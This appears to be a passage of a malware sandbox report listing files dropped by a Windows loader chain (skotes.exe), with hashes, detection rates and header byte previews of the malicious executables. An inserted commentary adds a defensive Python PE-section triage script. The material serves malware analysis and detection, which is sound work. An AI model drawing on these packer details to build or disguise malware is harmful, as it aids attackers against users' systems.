Entropy (8bit):7.99505709582503
Encrypted:true
SSDEEP:98304:Z/5zwjjEgd1H9RKNXpyUEJh56Nd1QVECgnD8EUVLbZJZCH3J53uJ+b:Z/qBdHRSXYBmrohgnDfUxbZJE2K
MD5:3A425626CBD40345F5B8DDDD6B2B9EFA
SHA1:7B50E108E293E54C15DCE816552356F424EEA97A
SHA-256:BA9212D2D5CD6DF5EB7933FB37C1B72A648974C1730BF5C32439987558F8E8B1
SHA-512:A7538C6B7E17C35F053721308B8D6DC53A90E79930FF4ED5CFFECAA97F4D0FBC5F9E8B59F1383D8F0699C8D4F1331F226AF71D40325022D10B885606A72FE668
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 87%
Reputation:unknown
Preview:MZ`.....................@...................................`...........!..L.!Require Windows..$PE..L....?.O............................_.............@..................................D..............................................0...O...........{C..?..............................................................l............................text............................... ..`.rdata...;.......<..................@..@.data....M..........................@....rsrc....O...0...P..................@..@........U..`.A.......S3.;.VWt.f9.b.A.t...`.A.P.P...P....Y.nj'.@....u..v..=..A..6P......P....9^..].v8.^..3......h..A.P..........P......P..x.A..E..E....;F.r......P.~...Y..6..j...t.A...t$..D....V...%s......A..F8......^.j..q.....A..3.9.`.A.t...@....9D$.t..t$.Ph.....5X.A.....A.3.....D$..`...|$..u..@.....3.....p.A.............t$..D$..t$...`.A./.@..t$...P.Q..%`.A...3.....T$..L$....f..AABBf..u..L$.3.f9.t.@f.<A.u...t$...T.A..L$.......%..........S.\$.V..C;^.tLW3.j.Z...........Q.....3.9F.Y~.9F

Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):22016
Entropy (8bit):5.338206717136569
Encrypted:false
SSDEEP:384:78HIRrJs1HLBDhq5RWBNBlBThtq2uoyLizwxeNLHdWuNMV275RtAcL8SFS69rvwM:Qqls1HLBDhIRWbXlq2uVk75RuSFSm6EJ
MD5:04F57C6FB2B2CD8DCC4B38E4A93D4366
SHA1:61770495AA18D480F70B654D1F57998E5BD8C885
SHA-256:51E4D0CBC184B8ABFA6D84E219317CF81BD542286A7CC602C87EB703A39627C2
SHA-512:53F95E98A5ECA472ED6B1DFD6FECD1E28EA66967A1B3AA109FE911DBB935F1ABF327438D4B2FE72CF7A0201281E9F56F4548F965B96E3916B9142257627E6CCD
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 57%
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...f.7..........."...0..L...........j... ........@.. ....................................`.................................<j..O....................................i..8............................................ ............... ..H............text....J... ...L.................. ..`.rsrc................N..............@..@.reloc...............T..............@..B................pj......H.......(7...2...........................................................0..8.......s/.....(....} .....}!.....}.....| .....(...+.| ...(....*.0..P........~.........,B.r...p(.....r...p(.....(.....r...p.(....(......(....o......(......*.0..8.......s2.....(....}(.....}).....}'....|(.....(...+.|(...(....*.0..H........s......./......+....~.....~.....io.........X.......-.r...p.(......+...*.0............r...p( ...o!....+..*...0............r...p( ...o!....+..*...0..2.........r...pr...p

Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:dropped
Size (bytes):4471808
Entropy (8bit):7.986737809414949
Encrypted:false
SSDEEP:98304:7j9CAb4Juu5XcCCvf1it7R0E395jinPEQIYocTbc7M/f5iBGLf0I:7JCAb42Cg0t7fUPzj5iBosI
MD5:6D3D9DB92D0303C635E5EE37927AF3D0
SHA1:2503576F28631D418C634A20EE4DEBAD8B93CF40
SHA-256:8B09CD26504C9B2E50C6A82A63CD41F25EF88B5D144708EBD444FEF16721F4E4
SHA-512:249A3F1FC17AB61B9E90E985AC292CEABB80AB8DDD360B9231E125C88816A8672397C56DD03D935D81DC748296C93F3BC99BB8C45B1A816084726839954C9EAA
Malicious:true
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....cg...............(.JI..Lu..2...........`I...@..................................{D...@... ............................._.r.s.....r.....................|...............................,....................................................... . ..r......4(.................@....rsrc.........r......D(.............@....idata ......r......F(.............@... ..9...r......H(.............@...hdwdyvma............J(.............@...sgdtbgtm..............D.............@....taggant.0......."....D.............@...........................................................................................................................................................................................................................................................................................................................................................

Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1881088
Entropy (8bit):7.936505097294003
Encrypted:false
SSDEEP:49152:/1nIgasOJRRBXvNgwKNFKcMhO2ow+GrmlLq8:/lLasOJhXFgZB1w+GrE
MD5:8A1AE39FD06F240834EE7731E4470D2F
SHA1:CECA8F3CA15649D9109DD3CDB5BF990478606FBA
SHA-256:AD388620D15362F0DBD39DC6FFD7E8622155D79D36061E6EE0159158DF0A4AD8
SHA-512:FE9D0DB82058F55FABE9281E02435603C33AF38C9FAD5A0A6B2289AD0883D251D20CD7649AC8A97FDEE30994AA77A97D69E30D7BBD3EA4080160E2504ECBCD51
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 38%
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i...........nG@.....ZR.....ZC.....ZU.................Z\.....ZB.....ZG....Rich...................PE..L....,.e.....................@....................@.........................................................................[.A.o.....@.....................................................H....................................................... . ..@......N..................@....rsrc.........@..p...^..............@....idata ......A.....................@... . (...A.....................@...mptavxer......i.....................@...supuhgzh.....p......................@....taggant.0......."..................@...........................................................................................................................................................................................................................................

Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1831936
Entropy (8bit):7.947651280489633
Encrypted:false
SSDEEP:49152:PfsZ4UgTVsUOU0YDYV7goy1ERSTn73kctxI:PfoTgZHOUeVFyG2jkcTI
MD5:C20D4E11E1046A5665D427BB4F6DE39E
SHA1:7DE8606D46B0B756D63D6ADC2D906B8752CDA9A5
SHA-256:486D1F0393573819C605E951CF677FBE4F7176B0313467F2E1716077F56C36C1
SHA-512:DF671D80E8D17B502208C1BDE7DDBF13D51BCC99F314ECAFB21086C7FC8F3B70F9CA5C6B8B23721CB77DA3171D0C68C59BC7F032D79DA1F1EE53F5F1F5598FBD
Malicious:true
Reputation:unknown
Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):2862592
Entropy (8bit):6.510957512245679
Encrypted:false
SSDEEP:49152:6fF5xPCzMPawdr/lJnsByv1AMJGQHQZOSTskFiza7j1ZpQjn7c6DBklg:6NfPCzMPawdr/lJnsByv1XGiQZOSTskC
MD5:6149ACB6D658FE29407A8AB94D3A0784
SHA1:8DDA8F399536348199633F110A0C1BD46F3CA683
SHA-256:6E339B0795D670E0D4C8CE7FA99444538DFBE76FC5889B3D121F3D843D7DBE8C
SHA-512:BD9C4E5DFD3DBAF310631E75157719C823FE2718870707EEDC184EE2F4E9E0BF0FDA8DE0FBA5DF0067988883914CD9387D730E7B5CCB58573CC2766EF06FFA2A
Malicious:true
Reputation:unknown
Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):968704
Entropy (8bit):6.699085607109417
Encrypted:false
SSDEEP:12288:OqDEvFo+yo4DdbbMWu/jrQu4M9lBAlKhQcDGB3cuBNGE6iOrpfe4JdaDga7lk0:OqDEvCTbMWu7rQYlBQcBiT6rprG8aJL
MD5:FB1BFBB2B0FA71F93BEFD137BECD031B
SHA1:067E74E608761765408F511DB0EA7927AD898D9A
SHA-256:D8B3EC82006B92576468332476E7A0D0AB6666780169BBDCCD3523CD04702B18
SHA-512:8FF15CD4D17F3AE176D664E1691F328F2571218038213573DA62C1DF99D9F127850008B833F45DC924B4B2CB9B9752115809500270E02060FD4DE4B82C172D06
Malicious:true
Reputation:unknown
Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):2832896
Entropy (8bit):6.5165667331631
Encrypted:false
SSDEEP:24576:U/MZ4RuXej5GiT4IBFSKW9aYjXTYflrJT77LSk+9DgpTqYs7Qwc2gh1lnd4qaCmP:h/edtxgV9Xf9Dgp+Y0Qoghjnr+gU1kM
MD5:FE5BD55DB7C14A3864CE057F8738AE39
SHA1:C13D0A62DC8F834FDAA9E780E9258ED2F1A58EED
SHA-256:7D9E4AF11845E1A8490A2A0D5D71670EBC3FA21B0A8F16656661396A9053CF2E
SHA-512:E586A3429335357307DEAB56EC16618935B152B1ECB5C016B29EE1F96D89456CC8805069AFC63CA84DA458261BEFE67C5204C7ACD18EAC5BD3D49E5C641D326C
Malicious:true
Reputation:unknown
Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1863680
Entropy (8bit):7.947727721324286
Encrypted:false
SSDEEP:49152:b0iMcVeC2k+eFGF2uX6zTTIudd8Cshc5:oi5zTop63rLW
MD5:27C1F96D7E1B72B6817B6EFEFF037F90
SHA1:2972CC112FC7E20CBF5952ABE07407B8C1FBB2A2
SHA-256:AEC3EC473DE321D123E939985579227EE62B53B3B3EDB7AB96E2A66C17E9696D
SHA-512:9A31DC9945889D35AEA8710DF2F42806C72C422B7B5F4AA8ACBA6986CBD9EA6A49181A41A50EE21CCBED86CBFF87C98A742E681AC3F6A87E2BD4436C9112EB32
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 58%
Reputation:unknown
Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):776832
Entropy (8bit):7.859727158445845
Encrypted:false
SSDEEP:12288:smOcxtujRwuweJH9RKC6cmulcfJbBiv0W6NLtXcgAuuweJH9RKC6cmulcfJbBivj:pG+XeJH9Rp6RtfNLtMmXeJH9Rp6RtfN8
MD5:AFD936E441BF5CBDB858E96833CC6ED3
SHA1:3491EDD8C7CAF9AE169E21FB58BCCD29D95AEFEF
SHA-256:C6491D7A6D70C7C51BACA7436464667B4894E4989FA7C5E05068DDE4699E1CBF
SHA-512:928C15A1EDA602B2A66A53734F3F563AB9626882104E30EE2BF5106CFD6E08EC54F96E3063F1AB89BF13BE2C8822A8419F5D8EE0A3583A4C479785226051A325
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 68%
Reputation:unknown
Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):863093
Entropy (8bit):7.96744840145825
Encrypted:false
SSDEEP:24576:qWryjPGki4+5vfHU3fYFy664hRvRKMU+Et:1+FQVUPA/v8MhQ
MD5:8EB4F92605E35C57A42B0917C221D65C
SHA1:0E64D77EF1B917B3AFE512B49710250C71369175
SHA-256:B57D78D93F74F7AE840AB03D3FDA4F22A24AD35AFCF9A53128CF82A92A67A085
SHA-512:4CC5DB426C8DE3D7AFDCFA26440D5BD9A885F5148E4307B8D04C5D56C96672D5C82ED9989BF346CE7AECEA07D980735C46A930B885F824BA53738AC76DBB05BF
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 8%
Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t.......B...8............@..........................p............@.................................@............R...............$...`.......................................................................................text....r.......t.................. ..`.rdata..n+.......,...x..............@..@.data....+..........................@....ndata...................................rsrc....R.......T..................@..@.reloc.......`......................@..B................................................................................................................................................................................................................................................................................................................

Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):1114112
Entropy (8bit):7.7336985855739355
Encrypted:false
SSDEEP:24576:FAu2uOTJr0/sBIpMvVEDvtNNVpk3BLSx+ptEH76duCiheu2:4ugJAGIpMmZNNEBLSx4EHGxiC
MD5:EF08A45833A7D881C90DED1952F96CB4
SHA1:F04AEEB63A1409BD916558D2C40FAB8A5ED8168B
SHA-256:33C236DC81AF2A47D595731D6FA47269B2874B281152530FDFFDDA9CBEB3B501
SHA-512:74E84F710C90121527F06D453E9286910F2E8B6AC09D2AEB4AB1F0EAD23EA9B410C5D1074D8BC759BC3E766B5BC77D156756C7DF093BA94093107393290CED97
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 67%
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...$.cg..............0......2........... ........@.. .......................`............@.....................................W.......H/...................@....................................................... ............... ..H............text........ ...................... ..`.rsrc...H/.......0..................@..@.reloc.......@......................@..B........................H........<..........K.......`p...........................................Y?.F60...5..8....4zc.:.V........N.0...1.....O*.S..~.......I...pR..iI......Pn}...iJ!BH.+o/S..yj...8T'.}....y.I.kD.....'....$.6....}..w[. )...j..[.-..0....|...p....h\..L....R.T.~......b.K.h....".8.s`)...1... ....[i&.9....a?.F..N..~..._.^...Q.....43.L.....@v...x..IB.4...........|......(........~.Y.L.S..;..x.)w...v...:..2.....y.%{3w.)..^..7......@...7..k.H..p}."..%.p....0.g.3....g..

Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:dropped
Size (bytes):4472832
Entropy (8bit):7.9831324854567525
Encrypted:false
SSDEEP:98304:0AxwVsVZfgzsP1cbHf1EPVqiWzt7+upuJl184hMfyQmEhGR6NOBUDi:0ASgfgg19MiW8GuJl1wyO7rG
MD5:AF683C74F40C689194ACC25F6A9DFFEC
SHA1:B3F7FD19A91ED79DCBEFB82FF38D644301287BC0
SHA-256:ED7428FF275BAF08AD7E20DB9F514302495927A744613ABDB77AEED0A0ADD3C9
SHA-512:BC5058BCA0FEEDDC41DD798257991F7788CE183489AD11EEF9E008C0DA4A2B78BDEECF4BED86571A20ECFD23C41E7F87CAD577CCCAD804F36DBB5C5C309C852F
Malicious:true
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....cg...............(.VH...v..2...`.......pH...@.................................n.D...@... ............................._pt.s....`t.....................$E...............................D...................................................... . .Pt......L(.................@....rsrc........`t......\(.............@....idata .....pt......^(.............@... ..9...t......`(.............@...odlbdsvw.............b(.............@...ivvnrpag.....P........D.............@....taggant.0...`..."....D.............@...........................................................................................................................................................................................................................................................................................................................................................

Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:dropped
Size (bytes):1374720
Entropy (8bit):7.0671827674657335
Encrypted:false
SSDEEP:24576:fYlZH+uQDPYLZtPikfLyXFD3qRc4f6GO4k88P9VB77Ml8fmMxHr:fYu7DPYLZtakzyVD3ELCh//+8fmW
MD5:669ED3665495A4A52029FF680EC8EBA9
SHA1:7785E285365A141E307931CA4C4EF00B7ECC8986
SHA-256:2D2D405409B128EEA72A496CCFF0ED56F9ED87EE2564AE4815B4B116D4FB74D6
SHA-512:BEDC8F7C1894FC64CDD00EBC58B434B7D931E52C198A0FA55F16F4E3D44A7DC4643EAA78EC55A43CC360571345CD71D91A64037A135663E72EED334FE77A21E6
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 28%
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....h.D..........&....&..........................@..........................p......\U....@... ..............................P..........,l.......................c...................................................T...............................text...............................`..`.data...H...........................@....rdata..............................@..@.eh_fram............p..............@..@.bss....4....@...........................idata.......P......................@....CRT....8....p.......$..............@....tls.................&..............@....rsrc...,l.......n...(..............@..@.reloc...c.......d..................@..B................................................................................................................................................................................................................................

Process:C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exe
File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):242176
Entropy (8bit):6.47050397947197
Encrypted:false
SSDEEP:6144:SIQpxILDXGGMO7Ice9C5kQw2hWHcHTykhb:SIQpxILDXGGlET9n/cHG
MD5:2ECB51AB00C5F340380ECF849291DBCF
SHA1:1A4DFFBCE2A4CE65495ED79EAB42A4DA3B660931
SHA-256:F1B3E0F2750A9103E46A6A4A34F1CF9D17779725F98042CC2475EC66484801CF
SHA-512:E241A48EAFCAF99187035F0870D24D74AE97FE84AAADD2591CCEEA9F64B8223D77CFB17A038A58EADD3B822C5201A6F7494F26EEA6F77D95F77F6C668D088E6B
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Jl.X...........!..................... ........... ....................... ............@.....................................W.................................................................................... ............... ..H............text...4.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........`..4e...........U..............................................}.Y.y.=.{.X.x.=..r...p.o2....o...(3.....o2...}....*:..s.....(....*.......*2r...p(;...&*Vr...p.....r...p.....*..(....*>.........}....*...(C.....o...(D...(E...}.....(F...(E...(G...&*>.........}....*...(C.....o...(D...}.....(F...(E...(H...&*".......*>.........}....*R..} .....{ ...oo...*..{ ...*"..}!...*..{!...*...}.....{#....{....op....{....,...{ ...oo...*..{!...oo...*..{....*B.....su...(v...*..{#....{#...

Process:C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exe
File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):1502720
Entropy (8bit):7.646111739368707
Encrypted:false
SSDEEP:24576:7i4dHPD/8u4dJG/8yndSzGmTG2/mR2SGeYdc0GmTG2/mR6Trr2h60qP:7rPD/8I/8ly+Zrr2h60qP
MD5:A8CF5621811F7FAC55CFE8CB3FA6B9F6
SHA1:121356839E8138A03141F5F5856936A85BD2A474
SHA-256:614A0362AB87CEE48D0935B5BB957D539BE1D94C6FDEB3FE42FAC4FBE182C10C
SHA-512:4479D951435F222CA7306774002F030972C9F1715D6AAF512FCA9420DD79CB6D08240F80129F213851773290254BE34F0FF63C7B1F4D554A7DB5F84B69E84BDD
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 75%
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..._............"...0..0...........O... ...`....@.. .......................@............`.................................LO..O....`...................... ......0O............................................... ............... ..H............text..../... ...0.................. ..`.rsrc.......`.......2..............@..@.reloc....... ......................@..B.................O......H.......h~...D......U... .................................................(....*..(....*.~....-.r...p.....(....o....s.........~....*.~....*.......*j(....r=..p~....o....t....*j(....rM..p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*.~....*..(....*Vs....(....t.........*N.(.....(.....(....*....0..f.......(.........8M........o....9:....o.......o.......-a.{......<...%..o.....%.

Process:C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):2832896
Entropy (8bit):6.5165667331631
Encrypted:false
SSDEEP:24576:U/MZ4RuXej5GiT4IBFSKW9aYjXTYflrJT77LSk+9DgpTqYs7Qwc2gh1lnd4qaCmP:h/edtxgV9Xf9Dgp+Y0Qoghjnr+gU1kM
MD5:FE5BD55DB7C14A3864CE057F8738AE39
SHA1:C13D0A62DC8F834FDAA9E780E9258ED2F1A58EED
SHA-256:7D9E4AF11845E1A8490A2A0D5D71670EBC3FA21B0A8F16656661396A9053CF2E
SHA-512:E586A3429335357307DEAB56EC16618935B152B1ECB5C016B29EE1F96D89456CC8805069AFC63CA84DA458261BEFE67C5204C7ACD18EAC5BD3D49E5C641D326C
Malicious:true
Reputation:unknown
Preview:MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P(,e.........."...0..$............+.. ...`....@.. ........................+.......+...`.................................U...i....`..D........................................................................................................... . .@... ...@... ..............@....rsrc...D....`.......`..............@....idata . ...........f..............@...kiohytmd..*.......*..h..............@...gbzfitgk. ...`+.......+.............@....taggant.@....+.."....+.............@...................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe
                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2862592
                                                                                                                                                                                                                              Entropy (8bit):6.510957512245679
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:49152:6fF5xPCzMPawdr/lJnsByv1AMJGQHQZOSTskFiza7j1ZpQjn7c6DBklg:6NfPCzMPawdr/lJnsByv1XGiQZOSTskC
                                                                                                                                                                                                                              MD5:6149ACB6D658FE29407A8AB94D3A0784
                                                                                                                                                                                                                              SHA1:8DDA8F399536348199633F110A0C1BD46F3CA683
                                                                                                                                                                                                                              SHA-256:6E339B0795D670E0D4C8CE7FA99444538DFBE76FC5889B3D121F3D843D7DBE8C
                                                                                                                                                                                                                              SHA-512:BD9C4E5DFD3DBAF310631E75157719C823FE2718870707EEDC184EE2F4E9E0BF0FDA8DE0FBA5DF0067988883914CD9387D730E7B5CCB58573CC2766EF06FFA2A
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... ...d..d..d....s.|....F.i....r.^..m.[.g..m.K.b....g..d.......w.w....E.e..Richd..........PE..L....dTg.....................(........N...........@...........................O.....*t,...@.................................M.$.a.....$.......................$..................................................................................... . ..$......h..................@....rsrc.........$......x..............@....idata ......$......z..............@...ifvqdref..*...$...*..|..............@...ulfvmwmt......N.......+.............@....taggant.0....N.."....+.............@...........................................................................................................................................................................................................................................................................................
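The two PE previews above expose the start of each section table: beside the usual .rsrc and .idata there are random eight-letter section names (kiohytmd, gbzfitgk, ifvqdref, ulfvmwmt) and a .taggant section, a layout typical of commercial protector/packer output, which is consistent with the "PE file contains section with special chars" and "PE file has a writeable .text section" signatures in the report summary. The following is an added example, not code from Joe Sandbox or from the sample: a dependency-free section-table parser that applies those two header checks plus a third packer heuristic (a section with virtual size but no data on disk). The PE image it runs on is constructed inline from the section names visible in the previews; the sizes, addresses and flags are assumptions chosen for illustration, not values read from the dropped files.

```python
import string
import struct

# Section characteristics flags from the PE/COFF specification.
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000

# Names a stock MSVC/MinGW link emits; anything else deserves a look.
COMMON_SECTIONS = {".text", ".rdata", ".data", ".idata", ".edata", ".rsrc", ".reloc",
                   ".bss", ".tls", ".pdata", ".CRT", ".didat", ".gfids", ".00cfg"}


def parse_sections(pe: bytes) -> list:
    """Return [(name, virtual_size, raw_size, characteristics), ...].

    Only the headers are read, so a file truncated after the section table
    (like a sandbox Preview that reaches that far) still parses."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ file")
    (e_lfanew,) = struct.unpack_from("<I", pe, 0x3C)
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    coff = e_lfanew + 4
    _machine, nsections, _ts, _symptr, _nsyms, opt_size, _flags = struct.unpack_from(
        "<HHIIIHH", pe, coff)
    first = coff + 20 + opt_size          # section table follows the optional header
    out = []
    for i in range(nsections):
        name, vsize, _va, rsize, _rp, _, _, _, _, chars = struct.unpack_from(
            "<8sIIIIIIHHI", pe, first + 40 * i)
        out.append((name.rstrip(b"\0").decode("latin-1"), vsize, rsize, chars))
    return out


def triage(pe: bytes) -> list:
    """Header-only checks; returns [(section_name, finding_code), ...]."""
    findings = []
    for name, vsize, rsize, chars in parse_sections(pe):
        executable = chars & (IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE)
        if executable and chars & IMAGE_SCN_MEM_WRITE:
            findings.append((name, "writable_code"))   # code that can rewrite itself (unpacking stub)
        if any(c not in string.printable or c.isspace() for c in name):
            findings.append((name, "special_chars"))   # non-ASCII / control bytes in the name
        elif name not in COMMON_SECTIONS:
            findings.append((name, "unusual_name"))    # e.g. random 8-letter packer sections
        if rsize == 0 and vsize:
            findings.append((name, "no_raw_data"))     # empty on disk, filled at run time
    return findings


def build_sample_pe(sections) -> bytes:
    """Constructed, headers-only PE32 image for demonstration (contains no code)."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 64)              # e_lfanew = 0x40
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0, 0x0102)
    table = b"".join(
        struct.pack("<8sIIIIIIHHI", n.encode("latin-1"), vs, va, rs, rp, 0, 0, 0, 0, ch)
        for n, vs, va, rs, rp, ch in sections)
    return dos + coff + table


# Constructed layout (assumed sizes/flags) using section names seen in the previews above.
RW_X = IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE
R_DATA = IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ
SAMPLE_PE = build_sample_pe([
    # name        vsize     vaddr     rsize   rptr    characteristics
    (".text",     0x1000,   0x1000,   0x1000, 0x400,  RW_X),
    (".rsrc",     0x4400,   0x6000,   0x4400, 0x1400, R_DATA),
    ("kiohytmd",  0x2A0000, 0xB000,   0,      0,      RW_X),
    ("gbzfitgk",  0x2000,   0x2B0000, 0x2000, 0x5800, RW_X),
    (".taggant",  0x3000,   0x2B2000, 0x2200, 0x7800, R_DATA),
    ("b\xe4d\x01", 0x100,   0x2B5000, 0x100,  0x9A00, R_DATA),
])

if __name__ == "__main__":
    for section, code in triage(SAMPLE_PE):
        print(f"{section!r:14} {code}")
```

To run it against a real dropped file, replace SAMPLE_PE with the file's bytes; a writable .text is a much stronger signal than an odd name alone, since some legitimate toolchains also emit non-standard section names.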
                                                                                                                                                                                                                              Process:C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exe
                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1136), with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1136
                                                                                                                                                                                                                              Entropy (8bit):5.884313058724772
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:QmeWUJxBiiAFaUlbJ2Hr1mI+Ic2iFerfnmj6BmKHnsZu:ZeX/ZkXgHr1m52iwrPvQInsZu
                                                                                                                                                                                                                              MD5:A10F31FA140F2608FF150125F3687920
                                                                                                                                                                                                                              SHA1:EC411CC7005AAA8E3775CF105FCD4E1239F8ED4B
                                                                                                                                                                                                                              SHA-256:28C871238311D40287C51DC09AEE6510CAC5306329981777071600B1112286C6
                                                                                                                                                                                                                              SHA-512:CF915FB34CD5ECFBD6B25171D6E0D3D09AF2597EDF29F9F24FA474685D4C5EC9BC742ADE9F29ABAC457DD645EE955B1914A635C90AF77C519D2ADA895E7ECF12
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                               Preview:
                                                                                                                                                                                                                              Process:C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exe
                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1136), with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1136
                                                                                                                                                                                                                              Entropy (8bit):5.884313058724772
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:QmeWUJxBiiAFaUlbJ2Hr1mI+Ic2iFerfnmj6BmKHnsZu:ZeX/ZkXgHr1m52iwrPvQInsZu
                                                                                                                                                                                                                              MD5:A10F31FA140F2608FF150125F3687920
                                                                                                                                                                                                                              SHA1:EC411CC7005AAA8E3775CF105FCD4E1239F8ED4B
                                                                                                                                                                                                                              SHA-256:28C871238311D40287C51DC09AEE6510CAC5306329981777071600B1112286C6
                                                                                                                                                                                                                              SHA-512:CF915FB34CD5ECFBD6B25171D6E0D3D09AF2597EDF29F9F24FA474685D4C5EC9BC742ADE9F29ABAC457DD645EE955B1914A635C90AF77C519D2ADA895E7ECF12
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                               Preview:
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
